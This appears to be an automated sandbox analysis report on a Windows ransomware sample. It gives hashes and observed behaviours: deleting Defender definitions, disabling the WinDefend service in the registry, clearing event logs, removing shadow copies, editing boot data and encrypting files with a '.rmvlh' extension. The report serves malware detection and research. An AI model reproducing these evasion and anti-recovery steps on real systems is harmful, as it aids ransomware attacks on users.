Analysis
-
max time kernel
115s -
max time network
117s -
platform
windows10_x64 -
resource
win10-en-20211208 -
submitted
13-01-2022 09:43
Static task
static1
Behavioral task
behavioral1
Sample
9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe
Resource
win7-en-20211208
Behavioral task
behavioral2
Sample
9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe
Resource
win10-en-20211208
General
-
Target
9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe
-
Size
2.8MB
-
MD5
4cd47497f204e06035a82dbf52b39fec
-
SHA1
bd07c57aead84fec6fac5eaa85d6ee5fb35bd4b8
-
SHA256
9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083
-
SHA512
f44a9c987946fcbfc19264915150ec150f65fe6aebf70cc3a48b38a4bb28d080cdd685290cae0462eb925dbede38b79c959fc45fb0486a136a2681461ab313f6
Malware Config
Signatures
-
Deletes Windows Defender Definitions 2 TTPs 1 IoCs
Uses mpcmdrun utility to delete all AV definitions.
Processes:
MpCmdRun.exepid process 3708 MpCmdRun.exe -
Modifies security service 2 TTPs 1 IoCs
Processes:
reg.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" reg.exe -
Clears Windows event logs 1 TTPs
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
Processes:
bcdedit.exebcdedit.exepid process 3844 bcdedit.exe 3884 bcdedit.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops file in Program Files directory 64 IoCs
Processes:
9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exedescription ioc process File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-black\GenericMailSmallTile.scale-200.png 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\selection-actions2x.png.N9EK56iEQ8f2gfR8Ros5nq302SQe7xs-C0hPrcPz6Yj_tii2gTQaD-A0.rmvlh 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.components.ui.zh_CN_5.5.0.165303.jar.N9EK56iEQ8f2gfR8Ros5nq302SQe7xs-C0hPrcPz6Yj_t0f5Y39cnIU0.rmvlh 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365SmallBusPremR_Subscription1-ul-oob.xrm-ms.N9EK56iEQ8f2gfR8Ros5nq302SQe7xs-C0hPrcPz6Yj_9gHqoKMFziE0.rmvlh 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftStickyNotes_1.4.101.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\StoreLogo.scale-100.png 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.People_10.1.10531.0_x64__8wekyb3d8bbwe\Assets\Sounds\Saving_Contact.wav 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe File opened for modification C:\Program Files\Common Files\System\Ole DB\es-ES\sqlxmlx.rll.mui.N9EK56iEQ8f2gfR8Ros5nq302SQe7xs-C0hPrcPz6Yj_iI3fXRwAzy80.rmvlh 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\8041_32x32x32.png 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.16112.11601.0_x64__8wekyb3d8bbwe\Assets\AppList.targetsize-32_altform-unplated.png 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\Assets\AppTiles\contrast-black\MapsAppList.scale-200.png 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019R_OEM_Perp6-ppd.xrm-ms.N9EK56iEQ8f2gfR8Ros5nq302SQe7xs-C0hPrcPz6Yj_ReEhstsEaVo0.rmvlh 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Messaging_3.26.24002.0_neutral_split.scale-150_8wekyb3d8bbwe\Assets\starttile.smile.small.scale-150.png 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Themes\Jumbo\mask\13s.png 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\Images\Ratings\Yelp10.scale-100.png 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX64\Microsoft Analysis Services\AS OLEDB\140\Resources\1033\msmdsrv.rll.N9EK56iEQ8f2gfR8Ros5nq302SQe7xs-C0hPrcPz6Yj_4Ww2MCI5RVo0.rmvlh 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftStickyNotes_1.4.101.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\LockScreenLogo.scale-100.png 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Flags\large\uy_60x42.png 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.XboxApp_25.25.13009.0_x64__8wekyb3d8bbwe\_Resources\6.rsrc 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Wallet_1.0.16328.0_neutral_~_8wekyb3d8bbwe\AppxMetadata\AppxBundleManifest.xml 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Work\LTR\LargeTile.scale-200.png 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.XboxApp_25.25.13009.0_x64__8wekyb3d8bbwe\Assets\GamesXboxHubAppList.targetsize-96_contrast-high.png 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ink\en-US\delete.avi 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe File opened for modification C:\Program Files\Microsoft Office\root\Templates\1033\TimelessReport.dotx.N9EK56iEQ8f2gfR8Ros5nq302SQe7xs-C0hPrcPz6Yj_Qer47oL-vbE0.rmvlh 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Audio\slide_in.wav 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Flags\small\kg_16x11.png 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.3DBuilder_13.0.10349.0_neutral_split.scale-180_8wekyb3d8bbwe\Assets\Office\ResetCoord.scale-180.png 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Tiles\klondike.jpg 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.1612.10312.0_x64__8wekyb3d8bbwe\Assets\Retail\Retail_Feedback_icon.png 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe File opened for modification C:\Program Files (x86)\Common Files\System\ado\en-US\msader15.dll.mui 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1702.333.0_x64__8wekyb3d8bbwe\Assets\AlarmsAppList.contrast-black_targetsize-24.png 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\fi-fi\ui-strings.js.N9EK56iEQ8f2gfR8Ros5nq302SQe7xs-C0hPrcPz6Yj_nwZFwoEghj80.rmvlh 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\uk-ua\ui-strings.js.N9EK56iEQ8f2gfR8Ros5nq302SQe7xs-C0hPrcPz6Yj_S7msAXLLV380.rmvlh 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\images\dd_arrow_small.png.N9EK56iEQ8f2gfR8Ros5nq302SQe7xs-C0hPrcPz6Yj_X1I-VTexe300.rmvlh 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\NewCommentRTL.White@3x.png.N9EK56iEQ8f2gfR8Ros5nq302SQe7xs-C0hPrcPz6Yj_J3KIiMV5mK40.rmvlh 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.10252.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppPackageAppList.targetsize-72_contrast-black.png 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Themes\Jumbo\jumbo_1d.png 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\OneNoteNotebookMedTile.scale-100.png 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\Bibliography\Style\ISO690.XSL.N9EK56iEQ8f2gfR8Ros5nq302SQe7xs-C0hPrcPz6Yj_4RPmkPOfcHE0.rmvlh 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\themes\dark\adobe_sign_tag_retina.png.N9EK56iEQ8f2gfR8Ros5nq302SQe7xs-C0hPrcPz6Yj_CTj-8bO0tFw0.rmvlh 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.10252.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppPackageBadgeLogo.scale-200_contrast-black.png 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\Bibliography\Sort\TAG.XSL.N9EK56iEQ8f2gfR8Ros5nq302SQe7xs-C0hPrcPz6Yj_kCNNyX4HzL00.rmvlh 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\comments.win32.bundle.N9EK56iEQ8f2gfR8Ros5nq302SQe7xs-C0hPrcPz6Yj_RmeggKMe-ww0.rmvlh 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.10252.0_x64__8wekyb3d8bbwe\Assets\AppPackageMedTile.scale-200.png 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ink\fr-CA\tipresx.dll.mui 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\meta\art\03_lastfm.luac.N9EK56iEQ8f2gfR8Ros5nq302SQe7xs-C0hPrcPz6Yj_V8kkclVirGU0.rmvlh 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\root\ui-strings.js.N9EK56iEQ8f2gfR8Ros5nq302SQe7xs-C0hPrcPz6Yj_CEJ-t4GjSgc0.rmvlh 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\4774_40x40x32.png 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-white\HxCalendarAppList.targetsize-40_altform-unplated.png 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\rhp_world_icon_hover_2x.png.N9EK56iEQ8f2gfR8Ros5nq302SQe7xs-C0hPrcPz6Yj_dwe----oYso0.rmvlh 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioPro2019DemoR_BypassTrial180-ul-oob.xrm-ms.N9EK56iEQ8f2gfR8Ros5nq302SQe7xs-C0hPrcPz6Yj_FTyJzi1wrJk0.rmvlh 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\Assets\Images\Stickers\Sticker_Planet.png 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\1113_20x20x32.png 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_ellipses-hover.svg.N9EK56iEQ8f2gfR8Ros5nq302SQe7xs-C0hPrcPz6Yj_sSOka5XTdik0.rmvlh 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectPro2019R_Trial-pl.xrm-ms.N9EK56iEQ8f2gfR8Ros5nq302SQe7xs-C0hPrcPz6Yj_AB6Y1puihvA0.rmvlh 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\Assets\Logos\BadgeLogo\PaintApplist.scale-150.png 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Home\RTL\contrast-black\SmallTile.scale-200.png 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioStdO365R_SubTest-ppd.xrm-ms.N9EK56iEQ8f2gfR8Ros5nq302SQe7xs-C0hPrcPz6Yj_pU8SmKIHsV00.rmvlh 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsStore_11701.1001.87.0_x64__8wekyb3d8bbwe\UX\Controls\Xbox360PurchaseControl\Xbox360PurchaseHostPage.html 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\5941_20x20x32.png 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\LinkedInboxLargeTile.scale-100.png 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\tr-tr\ui-strings.js.N9EK56iEQ8f2gfR8Ros5nq302SQe7xs-C0hPrcPz6Yj_zLYssWBObS00.rmvlh 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioProO365R_Subscription-ul-oob.xrm-ms.N9EK56iEQ8f2gfR8Ros5nq302SQe7xs-C0hPrcPz6Yj_rmz_MAepkj80.rmvlh 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\MainPageState2\freecell_bp_920.jpg 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsSoundRecorder_10.1702.301.0_x64__8wekyb3d8bbwe\AppxSignature.p7x 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exepid process 3400 vssadmin.exe -
Modifies registry class 3 IoCs
Processes:
reg.exereg.exereg.exedescription ioc process Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\EPP reg.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\EPP reg.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\ContextMenuHandlers\EPP reg.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 8 IoCs
Processes:
powershell.exepowershell.exe9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exepid process 828 powershell.exe 828 powershell.exe 828 powershell.exe 1248 powershell.exe 1248 powershell.exe 1248 powershell.exe 2428 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe 2428 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
wevtutil.exewevtutil.exewevtutil.exewmic.exewmic.exedescription pid process Token: SeSecurityPrivilege 1244 wevtutil.exe Token: SeBackupPrivilege 1244 wevtutil.exe Token: SeSecurityPrivilege 2840 wevtutil.exe Token: SeBackupPrivilege 2840 wevtutil.exe Token: SeSecurityPrivilege 2028 wevtutil.exe Token: SeBackupPrivilege 2028 wevtutil.exe Token: SeIncreaseQuotaPrivilege 692 wmic.exe Token: SeSecurityPrivilege 692 wmic.exe Token: SeTakeOwnershipPrivilege 692 wmic.exe Token: SeLoadDriverPrivilege 692 wmic.exe Token: SeSystemProfilePrivilege 692 wmic.exe Token: SeSystemtimePrivilege 692 wmic.exe Token: SeProfSingleProcessPrivilege 692 wmic.exe Token: SeIncBasePriorityPrivilege 692 wmic.exe Token: SeCreatePagefilePrivilege 692 wmic.exe Token: SeBackupPrivilege 692 wmic.exe Token: SeRestorePrivilege 692 wmic.exe Token: SeShutdownPrivilege 692 wmic.exe Token: SeDebugPrivilege 692 wmic.exe Token: SeSystemEnvironmentPrivilege 692 wmic.exe Token: SeRemoteShutdownPrivilege 692 wmic.exe Token: SeUndockPrivilege 692 wmic.exe Token: SeManageVolumePrivilege 692 wmic.exe Token: 33 692 wmic.exe Token: 34 692 wmic.exe Token: 35 692 wmic.exe Token: 36 692 wmic.exe Token: SeIncreaseQuotaPrivilege 876 wmic.exe Token: SeSecurityPrivilege 876 wmic.exe Token: SeTakeOwnershipPrivilege 876 wmic.exe Token: SeLoadDriverPrivilege 876 wmic.exe Token: SeSystemProfilePrivilege 876 wmic.exe Token: SeSystemtimePrivilege 876 wmic.exe Token: SeProfSingleProcessPrivilege 876 wmic.exe Token: SeIncBasePriorityPrivilege 876 wmic.exe Token: SeCreatePagefilePrivilege 876 wmic.exe Token: SeBackupPrivilege 876 wmic.exe Token: SeRestorePrivilege 876 wmic.exe Token: SeShutdownPrivilege 876 wmic.exe Token: SeDebugPrivilege 876 wmic.exe Token: SeSystemEnvironmentPrivilege 876 wmic.exe Token: SeRemoteShutdownPrivilege 876 wmic.exe Token: SeUndockPrivilege 876 wmic.exe Token: SeManageVolumePrivilege 876 wmic.exe Token: 33 876 wmic.exe Token: 34 876 wmic.exe Token: 35 876 wmic.exe Token: 36 876 wmic.exe Token: SeIncreaseQuotaPrivilege 876 wmic.exe Token: SeSecurityPrivilege 876 wmic.exe Token: SeTakeOwnershipPrivilege 876 wmic.exe Token: SeLoadDriverPrivilege 876 wmic.exe Token: SeSystemProfilePrivilege 876 wmic.exe Token: SeSystemtimePrivilege 876 wmic.exe Token: SeProfSingleProcessPrivilege 876 wmic.exe Token: SeIncBasePriorityPrivilege 876 wmic.exe Token: SeCreatePagefilePrivilege 876 wmic.exe Token: SeBackupPrivilege 876 wmic.exe Token: SeRestorePrivilege 876 wmic.exe Token: SeShutdownPrivilege 876 wmic.exe Token: SeDebugPrivilege 876 wmic.exe Token: SeSystemEnvironmentPrivilege 876 wmic.exe Token: SeRemoteShutdownPrivilege 876 wmic.exe Token: SeUndockPrivilege 876 wmic.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exedescription pid process target process PID 2428 wrote to memory of 936 2428 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe net.exe PID 2428 wrote to memory of 936 2428 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe net.exe PID 936 wrote to memory of 2980 936 net.exe net1.exe PID 936 wrote to memory of 2980 936 net.exe net1.exe PID 2428 wrote to memory of 3340 2428 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe net.exe PID 2428 wrote to memory of 3340 2428 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe net.exe PID 3340 wrote to memory of 3784 3340 net.exe net1.exe PID 3340 wrote to memory of 3784 3340 net.exe net1.exe PID 2428 wrote to memory of 3292 2428 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe net.exe PID 2428 wrote to memory of 3292 2428 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe net.exe PID 3292 wrote to memory of 364 3292 net.exe net1.exe PID 3292 wrote to memory of 364 3292 net.exe net1.exe PID 2428 wrote to memory of 3644 2428 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe net.exe PID 2428 wrote to memory of 3644 2428 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe net.exe PID 3644 wrote to memory of 636 3644 net.exe net1.exe PID 3644 wrote to memory of 636 3644 net.exe net1.exe PID 2428 wrote to memory of 1236 2428 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe net.exe PID 2428 wrote to memory of 1236 2428 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe net.exe PID 1236 wrote to memory of 1248 1236 net.exe net1.exe PID 1236 wrote to memory of 1248 1236 net.exe net1.exe PID 2428 wrote to memory of 1140 2428 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe net.exe PID 2428 wrote to memory of 1140 2428 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe net.exe PID 1140 wrote to memory of 508 1140 net.exe net1.exe PID 1140 wrote to memory of 508 1140 net.exe net1.exe PID 2428 wrote to memory of 884 2428 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe net.exe PID 2428 wrote to memory of 884 2428 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe net.exe PID 884 wrote to memory of 3580 884 net.exe net1.exe PID 884 wrote to memory of 3580 884 net.exe net1.exe PID 2428 wrote to memory of 2264 2428 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe net.exe PID 2428 wrote to memory of 2264 2428 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe net.exe PID 2264 wrote to memory of 1036 2264 net.exe net1.exe PID 2264 wrote to memory of 1036 2264 net.exe net1.exe PID 2428 wrote to memory of 356 2428 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe net.exe PID 2428 wrote to memory of 356 2428 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe net.exe PID 356 wrote to memory of 2212 356 net.exe net1.exe PID 356 wrote to memory of 2212 356 net.exe net1.exe PID 2428 wrote to memory of 1348 2428 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe sc.exe PID 2428 wrote to memory of 1348 2428 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe sc.exe PID 2428 wrote to memory of 2304 2428 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe sc.exe PID 2428 wrote to memory of 2304 2428 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe sc.exe PID 2428 wrote to memory of 1932 2428 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe sc.exe PID 2428 wrote to memory of 1932 2428 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe sc.exe PID 2428 wrote to memory of 1912 2428 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe sc.exe PID 2428 wrote to memory of 1912 2428 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe sc.exe PID 2428 wrote to memory of 1964 2428 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe sc.exe PID 2428 wrote to memory of 1964 2428 9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe sc.exe PID 2428 wrote to memory of 2228 2428 